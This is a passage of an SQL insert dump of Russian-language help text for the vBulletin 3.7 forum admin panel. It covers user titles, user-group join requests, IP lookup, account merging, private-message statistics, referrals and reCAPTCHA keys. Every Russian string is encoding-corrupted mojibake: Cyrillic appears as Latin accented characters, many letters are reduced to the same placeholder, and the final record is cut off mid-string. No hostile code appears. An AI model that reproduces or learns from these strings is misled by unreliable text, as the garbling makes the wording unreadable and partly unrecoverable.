(24844, -1, 'usergroup_updatepromotion_joinusergroupid_text', 'cphelptext', 'Åñëè ïîëüçîâà òåëü óäîâëåòâîðèò êðèòåðèÿì ýòîãî ïîâûøåÃèÿ, îà ñòà Ãåò ÷ëåÃîì ýòîé ãðóïïû. Ãóäåò ëè îñÃîâÃà ÿ ïîëüçîâà òåëüñêà ÿ ãðóïïà ñìåÃÃ¥Ãà , èëè ïîëüçîâà òåëþ áóäåò äîáà âëåÃî ÷ëåÃñòâî â äîïîëÃèòåëüÃîé ãðóïïå, çà âèñèò îò îïöèè \"Ñïîñîá ïîâûøåÃèÿ\" âûøå.', 'vbulletin', '', 0, ''),
(24845, -1, 'usergroup_updatepromotion_joinusergroupid_title', 'cphelptext', 'Ãåðåìåñòèòü â ãðóïïó', 'vbulletin', '', 0, ''),
(24846, -1, 'usergroup_viewjoinrequests_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò ïîäòâåðæäà òü çà ÿâêè Ãà âñòóïëåÃèå â âà øè äîïîëÃèòåëüÃûå ãðóïïû. Âûáåðèòå ãðóïïó èç ìåÃþ Ãà âåðõó, ÷òîáû ïðîñìîòðåòü çà ÿâêè Ãà âñòóïëåÃèå â Ãå¸. Äà ëåå âûáåðèòå äåéñòâèå äëÿ çà ÿâêè Ãà âñòóïëåÃèå (ïðèÃÿòü, îòêëîÃèòü èëè èãÃîðèðîâà òü). \r\n ÃðèÃÿòèå çà ÿâêè ñÃèìà åò çà ïðîñ èç î÷åðåäè Ãà ïðîâåðêè è äîáà âëÿåò ïîëüçîâà òåëÿ ê âûáðà ÃÃîé ãðóïïå. ÎòêëîÃÃ¥Ãèå çà ÿâêè òà êæå ñÃèìà åò å¸, îäÃà êî ïîëüçîâà òåëü ÃÃ¥ äîáà âëÿåòñÿ ê ãðóïïå. ÈãÃîðèðîâà Ãèå çà ÿâêè îñòà âëÿåò å¸ â î÷åðåäè Ãà ïðîâåðêó, ÷òîáû âû ìîãëè îáðà áîòà òü å¸ â äðóãîå âðåìÿ. \r\n Åñëè âû õîòèòå ïðèÃÿòü, îòêëîÃèòü èëè èãÃîðèðîâà òü âñå çà ïðîñû Ãà ïðèñîåäèÃÃ¥Ãèå, âû ìîæåòå Ãà æà òü ïîäõîäÿùóþ êÃîïêó Ãà âåðõó, êîòîðà ÿ ñîîòâåòñòâóþùèì îáðà çîì óñòà Ãà âëèâà åò âñå äåéñòâèÿ. \r\n Ëèäåðû ãðóïï ìîãóò òà êæå ïðîâåðÿòü ýòè çà ÿâêè Ãà ñòðà Ãèöå ×ëåÃñòâî â ãðóïïà õ â ñâî¸ì êà áèÃåòå.', 'vbulletin', '', 0, ''),
(24847, -1, 'usergroup_viewjoinrequests_title', 'cphelptext', 'Çà ÿâêè Ãà âñòóïëåÃèå', 'vbulletin', '', 0, ''),
(24848, -1, 'usertitle_text', 'cphelptext', 'Ñòà òóñû ïîëüçîâà òåëåé: \r\n Ñòà òóñû - ýòî ïîêà çà òåëü ñòà òóñà ïîëüçîâà òåëÿ Ãà ôîðóìå, îÃè îòîáðà æà þòñÿ Ãèæå èìåà â ñîîáùåÃèÿõ. Âû ìîæåòå èñïîëüçîâà òü óïðà âëåÃèå ñòà òóñà ìè ïîëüçîâà òåëåé , ÷òîáû ñîçäà òü ñèñòåìó ñòà òóñîâ ïîëüçîâà òåëåé, îñÃîâûâà ÿñü Ãà êîëè÷åñòâå îïóáëèêîâà ÃÃûõ ñîîáùåÃèÿõ. \r\n Ó÷òèòå, ÷òî åñëè â ãðóïïå ïîëüçîâà òåëÿ óêà çà à \"Ñòà òóñ ïîëüçîâà òåëÿ\" (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ), ïîëüçîâà òåëþ áóäåà ïðèñâîåà ñòà òóñ ãðóïïû âìåñòî îäÃîãî èç îïðåäåë¸ÃÃûõ â óïðà âëåÃèè ñòà òóñà ìè ïîëüçîâà òåëåé .', 'vbulletin', '', 0, ''),
(24849, -1, 'usertitle_title', 'cphelptext', 'Î ñòà òóñà õ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24850, -1, 'usertitle_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáà âèòü Ãîâûé ñòà òóñ ïîëüçîâà òåëÿ, ïðèñâà èâà åìûé Ãà îñÃîâà Ãèè êîëè÷åñòâà îïóáëèêîâà ÃÃûõ ñîîáùåÃèé. Êîãäà ïîëüçîâà òåëü äîñòèãÃåò óêà çà ÃÃîãî êîëè÷åñòâà îïóáëèêîâà ÃÃûõ ñîîáùåÃèé, åãî ñòà òóñ áóäåò ñìåøÃ.', 'vbulletin', '', 0, ''),
(24851, -1, 'usertitle_add_title', 'cphelptext', 'Äîáà âèòü Ãîâûé ñòà òóñ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24852, -1, 'usertitle_add_edit_title_text', 'cphelptext', 'Ãòî ñòà òóñ áóäåò ïðèñâîåà ïîëüçîâà òåëÿì, îïóáëèêîâà âøèì ÷èñëî ñîîáùåÃèé, óêà çà ÃÃîå Ãèæå.', 'vbulletin', '', 0, ''),
(24853, -1, 'usertitle_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(24854, -1, 'usertitle_add_edit_minposts_text', 'cphelptext', 'Ãòî ìèÃèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé, êîòîðîå Ãåîáõîäèìî îïóáëèêîâà òü ïîëüçîâà òåëþ, ÷òîáû ïîëó÷èòü óêà çà ÃÃûé âûøå ñòà òóñ. Êîãäà ïîëüçîâà òåëü îïóáëèêóåò ýòî êîëè÷åñòâî ñîîáùåÃèé, åãî ñòà òóñ áóäåò ñìåøà Ãà óêà çà ÃÃûé âûøå.', 'vbulletin', '', 0, ''),
(24855, -1, 'usertitle_add_edit_minposts_title', 'cphelptext', 'ÌèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24856, -1, 'usertitle_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäà êòèðîâà òü ñóùåñòâóþùèé ñòà òóñ ïîëüçîâà òåëÿ. Êîãäà ïîëüçîâà òåëü îïóáëèêóåò óêà çà ÃÃîå êîëè÷åñòâî ñîîáùåÃèé, åãî ñòà òóñ áóäåò ñìåøÃ.', 'vbulletin', '', 0, ''),
(24857, -1, 'usertitle_edit_title', 'cphelptext', 'Î ïîëüçîâà òåëÿõ', 'vbulletin', '', 0, ''),
(24858, -1, 'usertitle_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü çà âèñèìîñòü ñòà òóñîâ ïîëüçîâà òåëåé îò êîëè÷åñòâà îïóáëèêîâà ÃÃûõ èìè ñîîáùåÃèé. Êîãäà ïîëüçîâà òåëü îïóáëèêóåò óêà çà ÃÃîå êîëè÷åñòâî ñîîáùåÃèé, åãî ñòà òóñ áóäåò èçìåøÃ. Ñòà òóñû ïîëüçîâà òåëåé îòîáðà æà þòñÿ â ïðîôèëÿõ è ñîîáùåÃèÿõ. \r\n Ãà æìèòå êÃîïêó \"Äîáà âèòü Ãîâûé ñòà òóñ ïîëüçîâà òåëÿ\", ÷òîáû ñîçäà òü Ãîâûé ñòà òóñ ïîëüçîâà òåëÿ. Ãèæå Ãà õîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ñòà òóñîâ ïîëüçîâà òåëåé. Ñïðà âà îò êà æäîãî ñòà òóñà Ãà õîäèòñÿ ìåÃþ ñ îïöèÿìè \"ÈçìåÃèòü\" è \"Óäà ëèòü\" äëÿ, ñîîòâåòñòâåÃÃî, ðåäà êòèðîâà Ãèÿ ñòà òóñà è ìèÃèìà ëüÃîãî êîëè÷åñòâà ñîîáùåÃèé, Ãåîáõîäèìîãî äëÿ ïîëó÷åÃèÿ ýòîãî ñòà òóñà , è äëÿ óäà ëåÃèÿ ñòà òóñà .', 'vbulletin', '', 0, ''),
(24859, -1, 'usertitle_modify_title', 'cphelptext', 'Óïðà âëåÃèå ñòà òóñà ìè', 'vbulletin', '', 0, ''),
(24860, -1, 'usertitle_remove_text', 'cphelptext', 'Ãîäòâåðäèòå óäà ëåÃèå ýòîãî ñòà òóñà . Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(24861, -1, 'usertitle_remove_title', 'cphelptext', 'Óäà ëåÃèå ñòà òóñà ', 'vbulletin', '', 0, ''),
(24862, -1, 'usertools_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîëüçîâà òåëè \r\nÓïðà âëåÃèå ïîëüçîâà òåëÿìè \r\nÃëîêèðîâêà ïîëüçîâà òåëÿ \r\nÃà ññûëêà ýëåêòðîÃÃûõ ïèñåì \r\nÌà ñêè äîñòóïà \r\nÓïðà âëåÃèå ïîëüçîâà òåëÿìè: \r\n Ñåêöèÿ óïðà âëåÃèÿ ïîëüçîâà òåëÿìè ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëÿåò âà ì îáúåäèÃÿòü ïîëüçîâà òåëåé, ïðîñìà òðèâà òü è óïðà âëÿòü èõ ëè÷Ãûìè ñîîáùåÃèÿìè, ïðîñìà òðèâà òü ðåôåððà ëüÃóþ èÃôîðìà öèþ è èñêà òü ïîëüçîâà òåëüñêèå IP à äðåñà . \r\n ÂîçìîæÃîñòü îáúåäèÃÃ¥Ãèÿ ïîëüçîâà òåëåé ìîæåò áûòü î÷åÃü ïîëåçÃà , êîãäà èìååøü äåëî ñ ïîëüçîâà òåëÿìè, ó êîòîðûõ Ãåñêîëüêî à êêà óÃòîâ. Îïöèÿ \"ÎáúåäèÃÃ¥Ãèå ïîëüçîâà òåëåé\" ïåðåçà ïèñûâà åò à âòîðà âñåõ ïîëüçîâà òåëüñêèå ñîîáùåÃèÿ, ËÑ è ò.ä. äëÿ êà æäîãî à êêà óÃòà . \r\n Âû ìîæåòå ïðîñìîòðåòü ñòà òèñòèêó ËÑ âà øåãî ôîðóìà . Ãòà îïöèÿ ïîçâîëÿåò âà ì ïðîñìà òðèâà òü ñòà òèñòèêó õðà Ãÿùèõñÿ â ïà ïêà õ ïîëüçîâà òåëåé ËÑ. Âû òà êæå ìîæåòå óäà ëÿòü ëè÷Ãûå ñîîáùåÃèÿ ïîëüçîâà òåëåé. \r\n Åñëè ó âà ñ â îñÃîâÃûõ Ãà ñòðîéêà õ âêëþ÷åÃû ðåôåððà ëû, òî ïîëüçîâà òåëè ìîãóò ïðèãëà øà òü Ãîâûõ ëþäåé Ãà âà ø ôîðóì, èñïîëüçóÿ ñâîé ðåôåððà ëüÃûé èäåÃòèôèêà òîð, ÷òîáû ïîëó÷èòü î÷êè ðåôåððåÃãà . Âû ìîæåòå çà ïðîñèòü îò÷¸ò, îòîáðà æà þùèé ðåôåððà ëû âà øåãî ôîðóìà Ãà ñòðà Ãèöå Ãåôåððà ëû . Ãòà ôóÃêöèÿ ïðåäîñòà âèò èÃôîðìà öèþ î òîì, êà êèå ïîëüçîâà òåëè ïðèãëà øà þò Ãîâûõ ëþäåé Ãà âà ø ôîðóì. \r\n Ãà êîÃåö, âû ìîæåòå èñêà òü ïîëüçîâà òåëåé ïî IP à äðåñó èëè èñêà òü IP à äðåñà ïî èìåÃè ïîëüçîâà òåëÿ â ñåêöèè Ãîèñê ïî IP à äðåñó . Äâèæîê ôîðóìà çà ïèñûâà åò IP à äðåñà ïîëüçîâà òåëåé, êîòîðûå ïîñåùà þò âà ø ôîðóì. Ãåêîòîðûå èÃòåðÃåò ïðîâà éäåðû ïðèñâà èâà þò Ãîâûé IP à äðåñ êà æäûé ðà ç ïðè ñîåäèÃÃ¥Ãèè, â òî âðåìÿ êà ê äðóãèå ïðèñâà èâà þò òîëüêî îäèà IP à äðåñ. Ãîëüçîâà òåëè ñ äèÃà ìè÷åñêèìè IP ìîãóò áûòü áîëåå Ãåóëîâèìûìè ÷åì òå, ó êîãî ñòà òè÷åñêèé IP; òåì ÃÃ¥ ìåÃåå, IP à äðåñà ìîãóò áûòü èñïîëüçîâà Ãû äëÿ èäåÃòèôèêà öèè ïîëüçîâà òåëåé.\r\nÂîçìîæÃûì ïðèìåÃÃ¥Ãèåì ïîèñêà IP à äðåñîâ ìîæåò áûòü èäåÃòèôèêà öèÿ äðóãèõ à êêà óÃòîâ îäÃîãî è òîãî æå ÷åëîâåêà è áëîêèðîâêà IP ïðîáëåìÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24863, -1, 'usertools_title', 'cphelptext', 'Îá óïðà âëåÃèè ïîëüçîâà òåëÿìè', 'vbulletin', '', 0, ''),
(24864, -1, 'usertools_doips_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîñìîòðåòü ñîîòâåòñòâèÿ èìåÃè ïîëüçîâà òåëÿ è åãî IP à äðåñîâ, è Ãà îáîðîò, IP à äðåñà è ïîëüçîâà òåëåé, êîòîðûå åãî èñïîëüçîâà ëè.', 'vbulletin', '', 0, ''),
(24865, -1, 'usertools_doips_title', 'cphelptext', 'Ãîèñê ïî IP à äðåñó', 'vbulletin', '', 0, ''),
(24866, -1, 'usertools_doips_ipaddress_text', 'cphelptext', 'Ââåäèòå ñþäà IP à äðåñ, ïî êîòîðîìó æåëà åòå Ãà éòè ïîëüçîâà òåëåé. Âû ìîæåòå ââåñòè êà ê ïîëÃûé IP (Ãà ïðèìåð, 123.222.244.211), òà ê è ÷à ñòè÷Ãûé (Ãà ïðèìåð, 123, èëè 123.222, èëè 123.222.244, èëè 123.222.2).ÃîìÃèòå: åñëè ó âà ñ î÷åÃü ìÃîãî ñîîáùåÃèé, òî ýòîò ïðîöåññ ìîæåò çà Ãÿòü ïðîäîëæèòåëüÃîå âðåìÿ. ', 'vbulletin', 'zCarot', 1199736645, '3.7.0 Beta 4'),
(24867, -1, 'usertools_doips_ipaddress_title', 'cphelptext', 'Ãà éòè ïîëüçîâà òåëåé ïî IP à äðåñó', 'vbulletin', '', 0, ''),
(24868, -1, 'usertools_doips_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ, ÷òîáû Ãà éòè âñå èñïîëüçóåìûå èì IP à äðåñà .', 'vbulletin', '', 0, ''),
(24869, -1, 'usertools_doips_username_title', 'cphelptext', 'Ãà éòè IP à äðåñà ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24870, -1, 'usertools_doips_depth_text', 'cphelptext', 'Ãðè ãëóáèÃÃ¥ ïîèñêà 1, âà ì áóäóò îòîáðà æåÃû ëèøü ðåçóëüòà òû ïîèñêà . Ãðè ãëóáèÃÃ¥ 2 âû ïîëó÷èòå ðåçóëüòà òû ïîèñêà â òà êîì âèäå, êà ê áóäòî äëÿ êà æäîãî ïîëó÷åÃÃîãî ðåçóëüòà òà âû ïðîâåëè áû îòäåëüÃûé ïîèñê.\r\n Ãà ïðèìåð: \r\nÈùåì ïîëüçîâà òåëåé ñ IP 127.0.0.1 è ãëóáèÃîé ïîèñêà 1: ðåçóëüòà òû \"à äìèÃ\" è \"zÌà ðêîâêà \". Ãðè ïîèñêå ïî IP 127.0.0.1 è ãëóáèÃîé 2 ìû ïîëó÷èì: \"à äìèÃ\" è \"zÌà ðêîâü\", à òà êæå âñå IP à äðåñà , ïîä êîòîðûìè çà õîäèëè ïîëüçîâà òåëè \"à äìèÃ\" è \"zÌà ðêîâêà \".', 'vbulletin', '', 0, ''),
(24871, -1, 'usertools_doips_depth_title', 'cphelptext', 'ÃëóáèÃà ïîèñêà ', 'vbulletin', '', 0, ''),
(24872, -1, 'usertools_domerge_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîäòâåðæäåÃèÿ îáúåäèÃÃ¥Ãèÿ äâóõ óêà çà ÃÃûõ ïîëüçîâà òåëåé. Ãîæà ëóéñòà , ïðîâåðüòå ïðà âèëüÃîñòü îòîáðà æåÃÃîé Ãèæå èÃôîðìà öèè è Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ.', 'vbulletin', '', 0, ''),
(24873, -1, 'usertools_domerge_title', 'cphelptext', 'ÃîäòâåðæäåÃèå ñëèÿÃèÿ', 'vbulletin', '', 0, ''),
(24874, -1, 'usertools_gethost_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïðîñìîòðåòü èìÿ õîñòà ýòîãî IP à äðåñà .', 'vbulletin', '', 0, ''),
(24875, -1, 'usertools_gethost_title', 'cphelptext', 'Ãîêà çà òü õîñò', 'vbulletin', '', 0, ''),
(24876, -1, 'usertools_merge_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñäåëà òü èç äâóõ ïîëüçîâà òåëåé îäÃîãî. ÃðèìåÃÿåòñÿ äëÿ ñëèÿÃèÿ ñîîáùåÃèé, òåì è ò.ä. ïîëüçîâà òåëåé, èìåþùèõ Ãåñêîëüêî à êêà óÃòîâ.', 'vbulletin', '', 0, ''),
(24877, -1, 'usertools_merge_title', 'cphelptext', 'ÎáúåäèÃÃ¥Ãèå ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24878, -1, 'usertools_merge_sourceuser_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ-èñòî÷Ãèêà . ÑîîáùåÃèÿ ýòîãî ïîëüçîâà òåëÿ, òåìû, êà ëåÃäà ðÃûå ñîáûòèÿ, ëè÷Ãûå ñîîáùåÃèÿ, îïóáëèêîâà ÃÃûå ñîîáùåÃèÿ, ðåïóòà öèÿ, ñïèñêè çÃà êîìûõ, äðóçåé è èãÃîðèðîâà Ãèÿ áóäóò äîïèñà Ãû ê à êêà óÃòó ïîëüçîâà òåëÿ-ïîëó÷à òåëÿ. Ãðà âà äîñòóïà ïîëüçîâà òåëÿ-èñòî÷Ãèêà áóäóò ïåðåìåùåÃû â ïîëüçó ïîëüçîâà òåëÿ-ïîëó÷à òåëÿ.', 'vbulletin', 'zCarot', 1196775418, '3.7.0 Beta 1'),
(24879, -1, 'usertools_merge_sourceuser_title', 'cphelptext', 'Èìÿ ïîëüçîâà òåëÿ-èñòî÷Ãèêà ', 'vbulletin', '', 0, ''),
(24880, -1, 'usertools_merge_destuser_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ, êîòîðûé îñòà Ãåòñÿ ïîñëå îáúåäèÃÃ¥Ãèÿ. Ãòîò ïîëüçîâà òåëü óÃà ñëåäóåò îïóáëèêîâà ÃÃûå ñîîáùåÃèÿ, òåìû, ñîáûòèÿ êà ëåÃäà ðÿ, ëè÷Ãûå ñîîáùåÃèÿ, êîëè÷åñòâî ñîîáùåÃèé, ðåïóòà öèþ, ñïèñêè çÃà êîìûõ, äðóçåé è èãÃîðèðîâà Ãèÿ ïîëüçîâà òåëÿ-èñòî÷Ãèêà . Ãðà âà äîñòóïà ðåçóëüòèðóþùåãî ïîëüçîâà òåëÿ îñòà Ãóòñÿ òåìè æå.', 'vbulletin', 'zCarot', 1196775402, '3.7.0 Beta 1'),
(24881, -1, 'usertools_merge_destuser_title', 'cphelptext', 'Ãîëüçîâà òåëü-ïîëó÷à òåëü', 'vbulletin', '', 0, ''),
(24882, -1, 'usertools_pmfolderstats_text', 'cphelptext', 'Ãòî îò÷¸ò, îòîáðà æà þùèé ïà ïêè ËÑ ýòîãî ïîëüçîâà òåëÿ è ÷èñëî ËÑ â êà æäîé ïà ïêå.', 'vbulletin', '', 0, ''),
(24883, -1, 'usertools_pmfolderstats_title', 'cphelptext', 'Ñòà òèñòèêà ëè÷Ãûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24884, -1, 'usertools_pmstats_text', 'cphelptext', 'Çäåñü âû ìîæåòå èñêà òü ïîëüçîâà òåëåé, èìåþùèõ X ëè÷Ãûõ ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(24885, -1, 'usertools_pmstats_title', 'cphelptext', 'Ñòà òèñòèêà ëè÷Ãûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24886, -1, 'usertools_pmuserstats_text', 'cphelptext', 'Ãòî ñïèñîê âñåõ ïîëüçîâà òåëåé, õðà Ãÿùèõ X ëè÷Ãûõ ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(24887, -1, 'usertools_pmuserstats_title', 'cphelptext', 'Ãîëüçîâà òåëè, õðà Ãÿùèå X ËÑ', 'vbulletin', '', 0, ''),
(24888, -1, 'usertools_referrers_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñîçäà òü îò÷¸ò, îòîáðà æà þùèé ðåôåððà ëîâ çà îïðåäåëåÃÃûé ïåðèîä âðåìåÃè. \r\n Ãåôåððà ëüÃà ÿ ñèñòåìà ìîæåò áûòü Ãà ñòðîåÃà çäåñü . Ãåôåððà ëû ÃÃ¥ âîéäóò, ïîêà ñèñòåìà âûêëþ÷åÃà .', 'vbulletin', '', 0, ''),
(24889, -1, 'usertools_referrers_title', 'cphelptext', 'Ãåôåððà ëû', 'vbulletin', '', 0, ''),
(24890, -1, 'usertools_referrers_startdate_text', 'cphelptext', 'Ââåäèòå Ãà ÷à ëüÃóþ äà òó äëÿ îò÷¸òà . Âûáåðèòå ìåñÿö è ââåäèòå äâóçÃà ÷Ãûé äåÃü, ÷åòûðåõçÃà ÷Ãûé ãîä, äâóçÃà ÷Ãûé ÷à ñ è äâóçÃà ÷Ãûå ìèÃóòû. Îò÷¸ò îòîáðà çèò âñþ ðåôåððà ëüÃóþ èÃôîðìà öèþ çà ïåðèîä ñ Ãà ÷à ëüÃîé äî êîÃå÷Ãîé äà òû.', 'vbulletin', '', 0, ''),
(24891, -1, 'usertools_referrers_startdate_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', '', 0, ''),
(24892, -1, 'usertools_referrers_enddate_text', 'cphelptext', 'Ââåäèòå êîÃå÷Ãóþ äà òó äëÿ îò÷¸òà . Âûáåðèòå ìåñÿö è ââåäèòå äâóçÃà ÷Ãûé äåÃü, ÷åòûðåõçÃà ÷Ãûé ãîä, äâóçÃà ÷Ãûé ÷à ñ è äâóçÃà ÷Ãûå ìèÃóòû. Îò÷¸ò îòîáðà çèò âñþ ðåôåððà ëüÃóþ èÃôîðìà öèþ çà ïåðèîä ñ Ãà ÷à ëüÃîé äî êîÃå÷Ãîé äà òû.', 'vbulletin', '', 0, ''),
(24893, -1, 'usertools_referrers_enddate_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', '', 0, ''),
(24894, -1, 'usertools_removepms_text', 'cphelptext', 'Ãà æìèòå êÃîïêó \"Äà \" Ãèæå, ÷òîáû óäà ëèòü ëè÷Ãûå ñîîáùåÃèÿ ýòîãî ïîëüçîâà òåëÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà !', 'vbulletin', '', 0, ''),
(24895, -1, 'usertools_removepms_title', 'cphelptext', 'Óäà ëèòü ËÑ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24896, -1, 'usertools_removesentpms_text', 'cphelptext', 'Ãà æìèòå êÃîïêó \"Äà \" Ãèæå, ÷òîáû óäà ëèòü ëè÷Ãûå ñîîáùåÃèÿ, îòïðà âëåÃÃûå ýòèì ïîëüçîâà òåëåì, êîòîðûå óæå Ãà õîäÿòñÿ â ïà ïêà õ \"Âõîäÿùèå\" äðóãèõ ïîëüçîâà òåëåé. Ãòà îïåðà öèÿ Ãåîáðà òèìà !', 'vbulletin', '', 0, ''),
(24897, -1, 'usertools_removesentpms_title', 'cphelptext', 'Óäà ëèòü îòïðà âëåÃÃûå ïîëüçîâà òåëåì ËÑ', 'vbulletin', '', 0, ''),
(24898, -1, 'usertools_removesubs_text', 'cphelptext', 'Ãà æìèòå êÃîïêó \"Äà \" Ãèæå, ÷òîáû à ÃÃóëèðîâà òü ïîäïèñêè ýòîãî ïîëüçîâà òåëÿ Ãà òåìû ôîðóìà .  ðåçóëüòà òå îà ÃÃ¥ áóäåò áîëüøå ïîëó÷à òü óâåäîìëåÃèÿ î Ãîâûõ îòâåòà õ â ïîäïèñà ÃÃûõ òåìà õ. Ãòà îïåðà öèÿ Ãåîáðà òèìà !', 'vbulletin', '', 0, ''),
(24899, -1, 'usertools_removesubs_title', 'cphelptext', 'ÀÃÃóëèðîâà òü ïîäïèñêè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24900, -1, 'usertools_showreferrals_text', 'cphelptext', 'Ãòî ñïèñîê âñåõ ðåôåððà ëîâ ýòîãî ïîëüçîâà òåëÿ çà óêà çà ÃÃûé ïåðèîä âðåìåÃè.', 'vbulletin', '', 0, ''),
(24901, -1, 'usertools_showreferrals_title', 'cphelptext', 'Îòîáðà æåÃèå ðåôåððà ëîâ', 'vbulletin', '', 0, ''),
(24902, -1, 'usertools_showreferrers_text', 'cphelptext', 'Ãòî îò÷¸ò, îòîáðà æà þùèé âñåõ ðåôåððà ëîâ çà óêà çà ÃÃûé ïåðèîä âðåìåÃè. Ãà æìèòå Ãà èìÿ ïîëüçîâà òåëÿ Ãèæå, ÷òîáû óâèäåòü êà æäûé ðåôåððà ë äëÿ ýòîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24903, -1, 'usertools_showreferrers_title', 'cphelptext', 'Îòîáðà æåÃèå ðåôåððà ëîâ', 'vbulletin', '', 0, ''),
(24904, -1, 'verify_intro_text', 'cphelptext', 'ÎòäåëåÃèå ëþäåé îò ðîáîòîâ
\r\nÑèñòåìà îòäåëåÃèÿ ëþäåé îò ðîáîòîâ ñîçäà Ãà äëÿ òîãî, ÷òîáû ïðåäîòâðà òèòü (èëè õîòÿ áû îãðà Ãè÷èòü) à âòîìà òè÷åñêóþ ðà ññûëêó ñïà ìà ïî ôîðóìà ì.
\r\nÃŽÃà ïðîñèò âûïîëÃèòü ïðîñòóþ äëÿ ëþäåé çà äà ÷ó, Ãî ïðè ýòîì êîìïüþòåðà ì äëÿ âûïîëÃÃ¥Ãèÿ òà êîé çà äà ÷è ïîòðåáóåòñÿ ïðîâåñòè áîëüøèå è ñëîæÃûå âû÷èñëåÃèÿ.
', 'vbulletin', 'zCarot', 1205929568, '3.7.0 Release Candidate 1'),
(24905, -1, 'verify_intro_title', 'cphelptext', 'Ãà ñòðîéêè îòäåëåÃèÿ ëþäåé îò ðîáîòîâ', 'vbulletin', 'zCarot', 1205929568, '3.7.0 Release Candidate 1'),
(24906, -1, 'verify_intro_hv_recaptcha_privatekey_text', 'cphelptext', '×òîáû èñïîëüçîâà òü ñåðâèñ reCAPTCHA™, âà ì Ãåîáõîäèìî çà ðåãèñòðèðîâà òüñÿ Ãà recaptcha.net . Ãîñëå ðåãèñòðà öèè âû ïîëó÷èòå äâà êëþ÷à : ïóáëè÷Ãûé è ëè÷Ãûé. Çäåñü âà ì ÃóæÃî ââåñòè ëè÷Ãûé êëþ÷ reCAPTCHA™.', 'vbulletin', 'zCarot', 1208796155, '3.7.0 Release Candidate 4'),
(24907, -1, 'verify_intro_hv_recaptcha_privatekey_title', 'cphelptext', 'Ëè÷Ãûé êëþ÷ reCAPTCHA™', 'vbulletin', 'zCarot', 1208796155, '3.7.0 Release Candidate 4'),
(24908, -1, 'verify_intro_hv_recaptcha_publickey_text', 'cphelptext', '×òîáû èñïîëüçîâà òü ñåðâèñ reCAPTCHA™, âà ì Ãåîáõîäèìî çà ðåãèñòðèðîâà òüñÿ Ãà recaptcha.net . Ãîñëå ðåãèñòðà öèè âû ïîëó÷èòå äâà êëþ÷à : ïóáëè÷Ãûé è ëè÷Ãûé. Çäåñü âà ì ÃóæÃî ââåñòè ïóáëè÷Ãûé êëþ÷ reCAPTCHA™.', 'vbulletin', 'zCarot', 1208796122, '3.7.0 Release Candidate 4'),
(24909, -1, 'verify_intro_hv_recaptcha_publickey_title', 'cphelptext', 'Ãóáëè÷Ãûé êëþ÷ reCAPTCHA™', 'vbulletin', 'zCarot', 1208796122, '3.7.0 Release Candidate 4'),
(24910, -1, 'verify_intro_hv_recaptcha_theme_text', 'cphelptext', 'reCAPTCHA™ ïðåäîñòà âëÿåò Ãåñêîëüêî ñòèëåé. Ãòîò ïà ðà ìåòð ïîçâîëÿåò âûáðà òü ñòèëü, êîòîðûé âû æåëà åòå èñïîëüçîâà òü Ãà äà ÃÃîì ôîðóìå.', 'vbulletin', 'zCarot', 1208796230, '3.7.0 Release Candidate 4'),
(24911, -1, 'verify_intro_hv_recaptcha_theme_title', 'cphelptext', 'Ñòèëü reCAPTCHA™', 'vbulletin', 'zCarot', 1208796230, '3.7.0 Release Candidate 4'),
(24912, -1, 'verify_intro_hv_type_text', 'cphelptext', 'Ãðîâåðêà èçîáðà æåÃèåì
